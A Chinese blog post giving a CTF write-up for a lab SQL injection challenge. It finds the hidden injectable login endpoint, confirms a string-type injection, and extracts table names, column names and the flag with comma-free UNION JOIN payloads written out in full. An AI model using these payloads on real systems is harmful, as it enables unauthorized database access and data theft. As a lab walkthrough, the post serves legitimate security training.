文章 分类 标签 友链 关于

目录

[春秋云实企安殿]SQLi

 收录于  类别 CTF-WriteUp
     约 244 字   预计阅读 1 分钟 
目录

[春秋云实企安殿]SQLi

直接打开靶机地址会跳转到 /b68a89d1c4a097a9d8631b3ac45e8979.php ,查看页面源代码看到提示

http://cdn.wutongliran.top/img/image-20240309102824846.png

而这正是个坑,真正有注入漏洞的地址在 302 回包的内容里

http://cdn.wutongliran.top/img/image-20240309103513737.png

通过 /l0gin.php?id=1%27and%201=1%23/l0gin.php?id=1%27and%201=2%23 可以判断存在 sql 注入漏洞且为字符型

http://cdn.wutongliran.top/img/image-20240309105546560.png

http://cdn.wutongliran.top/img/image-20240309105602392.png

/l0gin.php?id=1%27order%20by%202%23/l0gin.php?id=1%27order%20by%203%23判断有2个回显位置

fuzz出逗号被截断,用无逗号注入

查库名

1

l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23

查表名

1

l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23

查flag

1

l0gin.php?id=-1%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
更新于 2024-03-09
阅读原始文档
 CTFSQL注入漏洞
返回 | 主页